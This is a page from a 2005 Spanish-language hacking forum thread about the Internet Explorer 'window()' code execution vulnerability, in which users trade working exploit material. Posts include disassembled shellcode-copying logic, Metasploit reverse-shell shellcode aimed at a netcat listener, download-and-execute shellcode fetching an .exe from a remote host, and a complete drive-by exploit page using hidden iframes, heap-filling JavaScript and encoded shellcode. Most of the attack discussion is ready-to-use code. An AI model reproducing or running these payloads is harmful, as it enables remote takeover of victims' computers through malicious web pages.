elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 18:50  


Tema destacado: [Overclocking] Récords de overclock del foro

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Microsoft Internet Explorer "window()" Code Execution Vulnerability
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 2 3 [4] Ir Abajo Respuesta Imprimir
Autor Tema: Microsoft Internet Explorer "window()" Code Execution Vulnerability  (Leído 10,760 veces)
-sagitari-


Desconectado Desconectado

Mensajes: 1.640


:D


Ver Perfil WWW
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #45 en: 27 Noviembre 2005, 21:11 »

yo cojo el code lo guardo html lo abro y me die Acción Cancelada

ja veus tu ...... xd
tanta cosa para nada
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #46 en: 27 Noviembre 2005, 22:32 »

Ok, antes que nada quiero especificar algunos requisitos para que funcione el bug.

Por algun motivo extraño en Windows 2000 ya no funciona, mas bien, en algunos, porque he probado en otra maquina y si ha funcionado.

Por lo tanto Windows XP SP2 aun es vulnerable, y no parece haber intensiones de hacer algo al respecto hasta que salga algun SP o un HotFix.

Hoy he descargado el Windows Update, y no hay ningun parche para esta vulnerabilidad, asi que aun estoy investigando porque diablos ya no funciona en Win2000.

El shellcode que publicaron, el PoC esta comprimido.. logicamente no podras verlo asi como asi, sinembargo no necesitas saber que es lo que hace.. solo hay que cambiar el contenido, yo he intentado colocar el shellcode de la vulnerabilidad de XMLHTTP, y me ha alertado mi firewall, asi que supongo que funcionó.

Ahora que si quieren aprender a hacer shellcodes, pues aprendan xD, por ahi vi un texto de Gospel muy bueno.

Saludos.
En línea

Obe

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #47 en: 28 Noviembre 2005, 00:26 »

He conseguido que ejecute logoff.exe. Metiendo el shellcode despues de %u5053%u5053%u9090. Pero a pesar de tener el mismo tamaño no funciona ni ejecutar cmd ni telnet...
alguien sabe xq?

Tambien con el generador de sc he hecho sc para sol.exe(solitario) y winmine y tal...  si lo ejecuto con un programa en c, se  ve en la lista de procesos pero no esta a la vista, xq ocurre esto? porcierto con el bug, lo ejecuta pero ocurre igual sale en la lista de procesos nada mas.
« Última modificación: 28 Noviembre 2005, 02:45 por Obe » En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #48 en: 2 Diciembre 2005, 08:55 »

Obe si que funciona el cmd..
Código:
%u2039%EC3%FFW%u0192%EC%04%E6E%F8c%C6E%F9m%C6E%FAd%C6E%FB.%C6E%FCe%C6E%FDx%C6E%FEe%B8D%u20AC%BFwP%8DE%F8P%FFU%F4
Saludos!
En línea

G3r4rD

Desconectado Desconectado

Mensajes: 34


Ver Perfil WWW
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #49 en: 3 Diciembre 2005, 11:45 »

Alguien ha conseguido ejecutar alguna shell diferente a la del poc, he estado probando de substituir la shell por otras tambien codificadas en utf-16 de otros exploits y no funcionan si alguien puede poner algun ejemplo que funcione...

Sirdarckcat el codigo del cmd no funciona estas seguro que esta completo
En línea
loredo

Desconectado Desconectado

Mensajes: 234



Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #50 en: 3 Diciembre 2005, 20:19 »

Creo que el problema es que solo funciona para shellcodes de un determinado tamaño.. Si a la shellcode que ejecuta calc.exe le metes 4 nops (%u9090%u9090) sigue funcionando, pero en el momento que añades otro más, ya no funciona..

¿Alguien más puede probar esto?

Todas las shellcodes que tengo sobrepasan el tamaño máximo y por eso no funcionan..
En línea

Los sabios buscan la sabiduría, los necios creen haberla encontrado...
Gospel
Colaborador
***
Desconectado Desconectado

Mensajes: 1.587


Ver Perfil WWW
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #51 en: 6 Diciembre 2005, 01:55 »

Tambien con el generador de sc he hecho sc para sol.exe(solitario) y winmine y tal...  si lo ejecuto con un programa en c, se  ve en la lista de procesos pero no esta a la vista, xq ocurre esto? porcierto con el bug, lo ejecuta pero ocurre igual sale en la lista de procesos nada mas.

Eso debe tratarse de que, efectivamente, las aplicaciones se lanzan pero no en el mismo contexto q el de USUARIO. Se deben de estar lanzando en el contexto de SYSTEM y por eso se muestran en la lista de procesos pero tú no puedes ver su ejecución gráfica. Pasa lo mismo q cuando intentas lanzar calc.exe desde una shell remota con privilegios de SYSTEM.
Aunq por esa regla, la calculadora tampoco debería poder abrirse... ahora me hace dudar...

Lo del tamaño de las shellcodes, no es la primera vez q aparece dando por culo en los exploits... No se si puede haber alguna forma de comprimir las shellcodes.
La shellcode del bind port de Skylined en el exploit IFRAME tampoco cabe?

« Última modificación: 6 Diciembre 2005, 01:57 por Gospel » En línea

Obe

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #52 en: 8 Diciembre 2005, 01:42 »

Obe si que funciona el cmd..
Código:
%u2039%EC3%FFW%u0192%EC%04%E6E%F8c...
[/quote]
Gracias por el aviso:), pero me temo que tengo que preguntarte:
 No se supone que hay que meterlo en utf-16? , que es lo restante?? puedes dar alguna referencia pa que busque info?.
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #53 en: 8 Diciembre 2005, 09:23 »

Obe:
este mismo foro, mi primer shellcode.. el que pongo es una ligera modificacion
Saludos
En línea

korven

Desconectado Desconectado

Mensajes: 3



Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #54 en: 12 Diciembre 2005, 01:05 »

Bueno, primero de todo... hola a todos, pues este es mi primer post, después de leer y leer y leer.... e intentar aprender. Bueno, al tema: He logrado poner una reverse shell usando este exploit. El truco consiste en modificar la parte de código donde se busca y copia la shell a un área de memoria más estable. Explico los pasos como lo he hecho yo, comentándolo, a ver que os parece...

-Desensamblo el código de "busca y copia"

00000000   90                     NOP
00000001   90                     NOP
00000002   90                     NOP
00000003   BA 42414241         MOV EDX,41424142
00000008   81F2 11111111       XOR EDX,11111111   <--- EDX=50535053, osea... las iniciales de Stuart Pearson (descubridor del bug) y que nos servirán para encontrar la shell en memoria.
0000000E   90                  NOP
0000000F   41                     INC ECX      <-- Bucle para buscar la ubicación de una de las copias de la shell
00000010   3911                CMP DWORD PTR DS:[ECX],EDX
00000012  ^75 FA               JNZ SHORT 0000000E
00000014   90                     NOP         <-- A partir de aki tenemos ubicada la shell en la dirección que tenemos en ECX
00000015   90                     NOP
00000016   8BF1                MOV ESI,ECX      
00000018   8BF8                MOV EDI,EAX      
0000001A   57                  PUSH EDI   
0000001B   90                  NOP
0000001C   33C9                XOR ECX,ECX
0000001E   66:B9 2D00          MOV CX,2D      <--- PUNTO CLAVE!, esta es la cantidad de datos que vamos a copiar a la zona estable (ESTO ES LO QUE HAY QUE MODIFICAR)
00000022   F3:A5               REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>   <--- Efectúa la copia a la zona estable
00000024   90                     NOP
00000025   90                     NOP
00000026   5F                     POP EDI
00000027   90                    NOP
00000028   FFE7                JMP EDI   <-- ejecuta la shell situada en la zona estable

- Fijándome en la shell que ejecuta el calc.exe...

"%u5053%u5053%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF")

Veo que comienza con las iniciales, para marcar el comienzo, y algunos NOP (90). El tamaño podemos ver que es de 90 words, o lo que es lo mismo 90 / 2 = 45... 45 en hexadecimal es 2D (la cantidad de datos que se copian a la zona estable. Pues bien... con todo esto, substituyo el calc por una reverse (concretamente la reverse shell del metasploit framework apuntando a mi dirección interna (lo estoy probando con un apache local) 192.168.0.2, puerto 4321 (donde dejo escuchando el netcat) y codificación por defecto... creo que utiliza Pex. He añadido tambien un par de nops justo detrás de las iniciales de Stuart para que mida exactamente 160 words:

"%u5053%u5053%u9090%u9090%uc929%ue983%ud9b8%ud9ee"
+"%u2474%u5bf4"
+"%u7381%u3113"
+"%u9a6e%u834b%ufceb%uf4e2%u04cd%u0671%u97d9%ub465"
+"%u0ece%u2711%u4a15%u0e11%ue50d%u4ee6%u6f49%uc075"
+"%u767e%u1411%u6f11%u0271%u5aba%u4a11%u5fdf%ud25a"
+"%uea9d%u3f5a%uaf36%u4650%uac30%ubf71%u3a0a%u63be"
+"%u8b44%u1411%u6f15%u2d71%u62ba%uc0d1%u726e%ua09b"
+"%u4232%uc211%u4a5d%u2a86%u5ff2%u2f41%u2dba%uc0aa"
+"%u6271%u3b11%uc32d%u0b11%u3039%uc5f2%u607f%u1b76"
+"%ub8ce%u18fc%u0657%u79a9%u1959%u79e9%u3a6e%u9b65"       
+"%ua559%ub777%u3e0a%u9d65%ue76e%u2d7f%u83b0%u4992"
+"%u0464%ub498%u06e1%u4243%uc3c4%ub4cd%u3de7%u18c9"
+"%u2d62%u08c9%u9162%u234a%uc6f1%u499a%u0657%uaa8a"
+"%u3d57%uaa13%u06a4%ub276%u0e9b%ub4cd%u04e7%u1a8a"
+"%u9164%u2d4a%u0a5b%u23fc%u0352%u1bf0%u4768%uc256"
+"%u04d6%uc2de%u5fd3%ub85a%ufb9b%ub613%u2ccf%ub5b7"
+"%u4273%u3117%uc509%ue031%u1c59%uf864%u9127%u63ef"
+"%ub8ce%u1cc1%u3f63%u1acb%u6f5b%u1acb%u3f64%u9b65"
+"%uc359%u4e43%u3dff%u9d65%u915b%u7c65%ubece%uacf2"
+"%ua848%ub4e3%u6a44%u9d65%u19ce%ub466%u06e1%uc16a"
+"%u3135%ub4c9%u91e7%u4b4a"

- La reverse mide exactamente 160 words, o lo que es lo mismo 160 / 2 = 80... 50 en hexadecimal. Por lo tanto, debemos modificar el "punto clave" por un bonito MOV CX, 50 (directamente el 2d de la última linea de prep_shellcode lo cambio por 50 y yastá).

P.D: estaría bien poner un LEAVE o algo que cierre el programa, como en el de la calculadora, pq si no se queda abierto y colgado el explorer. De todas formas aunque lo cierres manualmente (via Ctrl+Alt+Supr) el proceso de la shell no muere XDDD, así que...

P.D2: es mi primer post... no sé si me explico bien o está bien redactado o lo que sea... para cualquier cosa criticad todo lo que querais
« Última modificación: 12 Diciembre 2005, 01:27 por korven » En línea
VUGO

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #55 en: 12 Diciembre 2005, 04:18 »

Well,
this reverse shell works fine in my tests.

I am put a Download/Execute shellcode (http://192.168.0.4/test.exe), see below:

prep_shellcode =   unescape("%u9090%uBA90%u4142%u4142%uF281%u1111%u1111%u4190" +
         "%u1139%uFA75%u9090%uF18B%uF88B%u9057%uc933%ub966" +
         "%u00B4%ua5F3%u9090%u905f%ue7ff")

*** [NOTE: 360/2 = 180... B4 in HEXADECIMAL] ***

"%u5053%u5053%u9090%u9090%u4343%u4343%u5DEB%u8B5F%u80F7%u083F%u0375%u3780%u4708%u3F80"
                          +"%u7501%u33F2%uB5C9%u8B05%u2BFE%u8BF9%uB5EF%u2B03"
                          +"%u8BF9%uB2D7%u8B7C%u89E2%uFC75%u40B5%uE1C1%u8908"
                          +"%uF84D%u498D%u8B3C%u0309%uF84D%u498D%u417F%u098B"
                          +"%u4D03%u8BF8%u8BD9%u0C49%u4D03%u81F8%u4B39%u5245"
                          +"%u744E%u8D07%u145B%uCB8B%uEBEB%uC033%uEB53%uEB02"
                          +"%u8B7C%u0333%uF875%u7E80%u8003%u1474%u3E8B%u7D03"
                          +"%u47F8%u5647%u758B%u33FC%uB1C9%uF30D%u5EA6%u0674"
                          +"%u8D40%u0476%uE0EB%u8B5B%u105B%u5D03%uC1F8%u02E0"
                          +"%uD803%u038B%u4589%u8BF4%uFC5D%u5B8D%u530D%uD0FF"
                          +"%u4589%u8DF0%u095B%u8B53%uF445%uD0FF%u4589%u8BEC"
                          +"%uF045%u408B%u033C%uF045%u408B%u0378%uF045%u4589"
                          +"%u8BE8%u2040%u4503%u8DF0%u087B%uD233%u8B57%u0330"
                          +"%uF075%uC933%u0FB1%uA6F3%u0B74%uEB5F%uEB02%u427A"
                          +"%u408D%uEB04%u8BE7%uE85D%uC933%u5F53%u7F8B%u0324"
                          +"%uF07D%uE2D1%uFA03%u8B66%u8B0F%u1C5B%u5D03%uC1F0"
                          +"%u02E1%uD903%u1B8B%u5D03%u89F0%uE45D%u558B%u8DFC"
                          +"%u2D52%u7D8D%u33E0%uB1C9%u5106%u5252%u758B%u56F0"
                          +"%uFFFC%uFDD3%u5AAB%u3859%u742A%u4203%uF9EB%uE242"
                          +"%uB1E8%u5104%u5252%u758B%u56EC%uFFFC%uFDD3%u5AAB"
                          +"%u3859%u742A%u4203%uF9EB%uE242%uFCE8%u3352%uB6D2"
                          +"%uC11F%u08E2%u3352%uEBD2%uEB02%u527C%u458B%uFFD8"
                          +"%u5BD0%u4589%u33B8%u52D2%u5252%u5352%u458B%uFFC8"
                          +"%u89D0%uB445%u7B8D%u3308%u52D2%u80B6%uE2C1%u5210"
                          +"%uD233%u5252%u5057%u458B%uFFC4%u89D0%uB045%u558D"
                          +"%u52AC%uD233%u1FB6%uE2C1%u5208%u4D8B%u51B8%u8B50"
                          +"%uC045%uD0FF%u4D8B%u51B0%u458B%uFFBC%u8BD0%uB44D"
                          +"%u8B51%uBC45%uD0FF%uD233%u4352%u5343%u458B%uFFE0"
                          +"%u89D0%uA845%u7D8B%u57AC%u558B%u52B8%u8B50%uDC45"
                          +"%uD0FF%u558B%uEBA8%uEB02%u5217%u458B%uFFD4%u33D0"
                          +"%u52D2%u8B53%uD045%uD0FF%uD233%u8B52%uCC45%uD0FF"
                          +"%u0DE8%uFFFE%u4CFF%u616F%u4C64%u6269%u6172%u7972"
                          +"%u0841%u454B%u4E52%u4C45%u3233%u5708%u4E49%u4E49"
                          +"%u5445%u4708%u7465%u7250%u636F%u6441%u7264%u7365"
                          +"%u0873%u6C5F%u7263%u6165%u0874%u6C5F%u7277%u7469"
                          +"%u0865%u6C47%u626F%u6C61%u6C41%u6F6C%u0863%u6C5F"
                          +"%u6C63%u736F%u0865%u6957%u456E%u6578%u0863%u7845"
                          +"%u7469%u7250%u636F%u7365%u0873%u6E49%u6574%u6E72"
                          +"%u7465%u704F%u6E65%u0841%u6E49%u6574%u6E72%u7465"
                          +"%u704F%u6E65%u7255%u416C%u4908%u746E%u7265%u656E"
                          +"%u5274%u6165%u4664%u6C69%u0865%u6E49%u6574%u6E72"
                          +"%u7465%u6C43%u736F%u4865%u6E61%u6C64%u0865%u0872"
                          +"%u2E78%u7865%u0865%u7468%u7074%u2F3A%u312F%u3239"
                          +"%u312E%u3836%u302E%u342E%u742F%u7365%u2E74%u7865"
                          +"%u0065%u0108"

This is a Download/Execute shellcode.

Please test before use it.

Regards...
Igor Marcel - Vugo Verbal Killer (VUGO), <vugo"at"hotmail.com>
Information Security Consultant
"Linux is modism, BSD is a life style!"
« Última modificación: 12 Diciembre 2005, 17:06 por VUGO » En línea
alibaba

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #56 en: 14 Diciembre 2005, 11:16 »

a working exploit:
Código:
http://toolbarsite.biz/dl/adv648.php

adv648.php
Citar
<html>
<head>
</head>
<body>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv648.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv648.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv648.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv648.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv648.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv648.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv648.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv648.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=bag.htm></iframe>
</body>
</html>


fillmemadv648.htm
Citar
<HTML>
<HEAD>
<Script Language="javascript">


function load() {

var spearson=0
var eip = ""
var fillmem = ""


for (spearson=1 ; spearson <=500 ; spearson++)
{
  eip = eip + unescape("%u7030%u4300")
}


for (spearson=1 ; spearson <=200; spearson++)
{
  fillmem = fillmem + eip
}


fillmem = fillmem + unescape
("%uEED9%uD99B%u2474%u5EF4%uC02B%u082D%uFFFB%u2BFF"+
"%u60E0%uEC8B%uED83%u8BE0%u2BFD%u81C9%u6CE9%uFFFB"+
"%uF3FF%u2BA4%u2DC0%uFFD2%uFFFF%uC503%uE0FF%uDD8B"+
"%uC92B%uE981%uFEEC%uFFFF%u7381%uA944%u4A67%u83CC"+
"%uFCEB%uF4E2%u7541%uCC48%uEAA9%uD6FF%u67AA%u414A"+
"%uF314%uCC4E%u8FA9%uCE25%u67A9%u4E45%u661F%uCC4A"+
"%u27C3%uCC22%u6799%uA44A%u6351%uCC4A%u67C3%u59B5"+
"%u6305%uCC4A%uA7A2%u4845%u6633%uCC4A%uE220%uC8BE"+
"%u67A9%u39C1%u8F22%u34C1%u9F10%uCC4E%u94A9%u41EE"+
"%uF02C%uCC4A%u98A9%uA6AA%u0FAD%uFC4A%u67A9%uCC22"+
"%u66A9%uA64A%u98A9%u60DF%u67AD%uC74A%u6869%uAFCE"+
"%u67A8%u454A%u8B2C%uCC4E%uEAA9%u25CF%u67AA%u9C4A"+
"%uF256%uC8EE%u67A9%u0C41%uE3A6%uCD02%u67A9%u79C7"+
"%u643F%uCC4A%uDA24%uC8F6%u67A9%u26A2%u67A8%uC34A"+
"%u562B%uCC4B%u0DA9%uA64A%u0DA9%uA64A%uEAA9%u35CF"+
"%u67AA%u9C4A%uF256%uC8F6%u67A9%u0C41%uE3A6%uCD5E"+
"%u67A9%u49C3%u6371%uCC4A%u67C3%uCC20%u64C3%uCC20"+
"%u67C3%u9C20%uE224%uC801%u67A9%u471A%uBF2C%uCC4E"+
"%u37A9%u59B5%u636D%uCC4A%uA7A2%u4845%u674F%uCC4A"+
"%uE220%uC896%u67A9%uCD20%u67C1%u8C4A%u0DA9%uA64A"+
"%u0DA9%u414A%u042C%uCC4E%u37A9%u49C7%u645C%uCC4A"+
"%uECF9%u10CF%u67AD%u9C4A%uF256%uC882%u67A9%u0C41"+
"%uE3A6%uCCFA%u67A9%u49C3%u6349%uCC4A%u67C3%uCC20"+
"%u67C3%uCC20%uE222%uC8AA%u67A9%u331A%uAB3C%uCC4E"+
"%u6CA9%uC38A%uEA2D%uCC4A%uEEA9%u28CF%u67AD%u414A"+
"%u8F2C%uCC4E%u37A9%u3322%u6756%u474A%u8B2C%uCC4E"+
"%u37A9%u49C1%u6349%uCC4A%u98F9%u0CDF%u67AD%uC74A"+
"%u1369%u4796%u8F2C%uCC4E%u6CA9%uB88A%uEA7B%uD6FF"+
"%u67AA%uA44A%u66A9%uCC4A%u98FF%u78DF%u67AD%u414A"+
"%u1C2C%uCC4E%u37A9%u331C%uDF3C%uCC4E%uECA9%u7492"+
"%u67AB%uCC4A%u5241%uCC4A%uECA9%u20F7%u67AD%u474A"+
"%u8F1C%uCC4E%u8FA9%uCC03%u67A9%u49C1%u6379%uCC4A"+
"%u98F9%u6CDF%u67AD%uA64A%uEAA8%uD6CF%u67AA%u9C4A"+
"%uF256%uC8FA%u67A9%uCC20%uF256%uC8E2%u67A9%uA62A"+
"%u0FA9%uCCCA%u67A9%uA61A%u0DA9%uA449%u67A9%u0C4A"+
"%u98FA%u58DF%u67AD%u454A%uB72C%uCC4E%uEEA9%uE80E"+
"%u06B5%uAC89%u67C3%u9A1E%u98FE%u1CFF%u67AD%u334A"+
"%uFB3C%uCC4E%uEEA9%uE80E%u06B5%uAC89%u00CD%uCCEB"+
"%u27A9%u47D9%u98EA%uB90A%uEC50%uCF11%uF4CF%u4D2C"+
"%u2A92%uB810%uE6B3%uCCA1%u66A9%uAA4A%u5C28%u9607"+
"%u6ADD%u27CB%u67A9%uCC4B%uE6CF%u8171%u12F3%u45B9"+
"%u43F5%uAD56%u076A%u1E79%uE7FF%uCC74%u75DD%uB8EC"+
"%u2551%u9D71%u10B1%uFF5C%u2869%uB9E4%u3954%u24A1"+
"%uEEEF%uE83E%uEEA1%uE81E%u9F89%uAD12%u9E6A%u0B12"+
"%u43ED%uCC56%u67A9%uAD4A%u076A%u14C1%u2C22%u4776"+
"%u6CE5%uCF32%uEC62%uEC1B%uB4AA%uF6C1%u9CAA%uA61D"+
"%u8F56%u33E5%u9856%uE138%u20F6%u471D%u43F8%u1F49"+
"%uD0A6%u8E5E%u2622%uCF56%uEC6A%u5C4E%uA4AA%u471C"+
"%u43DD%u4546%uD9AD%u4714%u43D5%u4C4E%u6797%u1D3F"+
"%u3FF1%uADB2%u9E6A%u9412%uA4C8%uBE09%u06CC%uA93E"+
"%u0EEF%uA926%u67E8%uA919%u21DD%uA023%u37CC%uA525"+
"%u13C7%uBE2F%u30A9%uA538%u02DD%uA50C%u02C5%u8F4A"+
"%u08C5%uA939%u06E1%uA824%u02C5%u804A%u06C6%u802E"+
"%u05C0%uAD38%u1EDB%uCC0B%u1FEC%uB823%u15F9%uAF25"+
"%u14CC%uCC39%u0EFF%uB838%u06DC%u8D26%u0BC5%uAF25"+
"%u30A9%uA223%u1FEC%uAF2F%u20A9%uB82F%u1EFA%uB839"+
"%u0ACC%uA50E%u02DB%uB829%u15C6%u8D33%u0BA9%uB839"+
"%u04DB%uB82B%u67A9%uA203%u02DD%uA238%u13CC%uBC05"+
"%u09CC%uCC0B%u09E0%uA93E%u09DB%uB82F%u02FB%uA82B"+
"%u0EEF%uA926%u2EA9%uB824%u15CC%uA924%u24DD%uA225"+
"%u02C7%uB829%u67E8%uB802%u17DD%uBC05%u09CC%uA918"+
"%u12D8%uBF2F%u26DD%u844A%u13DD%u9F3A%u09CC%u9E2E"+
"%u16CC%uA93F%u13DA%uCC0B%u10A9%uA223%u09C0%uB82F"+
"%u0387%uA026%u20A9%u980F%u2AA9%uB625%u0BC0%uAD26"+
"%u5386%uFC64%u4F89%uA329%u17C4%uB82B%u05C0%uA926"+
"%u4792%u9F07%u22E0%uFA6A%u5787%uEC71%u0EFE%uA824"+
"%u10C6%uEC39%u33E7%uF96A%u5687%uEC71%u31FA%uF77B"+
"%u2A89%u8533%u55EC%uEC71%u2987%u980F%u2489%u9E06"+
"%u5689%uFD64%u5387%uFE79%u4E9B%uB84A%u08C6%uAE26"+
"%u15C8%uA539%u02DD%uAE64%u1DC0%uCC4A%u67A9%uCC4A"+
"%u67A9%uE34A%u0BCD%uA065%u06C6%uA92E%u06DB%uBA2E"+
"%u539F%uE272%u1FCC%uCC2F%u67A9%u904A%u04DA%uB827"+
"%u5198%uA964%u02D1%uCC4A%u67A9%uCC4A%u67A9%uCC4A"+
"%u67A9%u5C4A")

prompt(fillmem, fillmem)

}
</Script>
</head>
<body onload="setTimeout('load()',500)">
</body>
</HTML>

via governmentsecurity.org

how do you customize it?
En línea
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #57 en: 15 Diciembre 2005, 00:59 »

alibaba ya explicarn como VUGO. aunque no queria que pusieran un shellcode, hasta que hubiera parche ya es demasiado tarde.

porcierto porfavor si van a hablar en el foro, usen un traductor a español, (digo, muchos sabemos ingles) pero esta en contra de las reglas del foro.. y si lo ve algun moderador que lo desee lo borra.

Saludos!!
En línea

Ture

Desconectado Desconectado

Mensajes: 16



Ver Perfil
Re: Microsoft Internet Explorer "window()" Code Execution Vulnerability
« Respuesta #58 en: 17 Diciembre 2005, 20:49 »

Ya ha parcheado el señor Gates sus Explorers, solamente ha tardado 1 mes ;D ahora la pregunta es, ¿q ha estropeado al "arreglar" esto?  ;)
En línea
Páginas: 1 2 3 [4] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Alguna manera de "desactivar" el modo InPrivate de Internet Explorer
Hacking Básico
oisac 0 1,124 Último mensaje 8 Mayo 2011, 11:57
por oisac
Microsoft lanza la segunda "Platform Preview" de Internet Explorer 10, con el...
Noticias
wolfbcn 0 432 Último mensaje 30 Junio 2011, 18:46
por wolfbcn
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines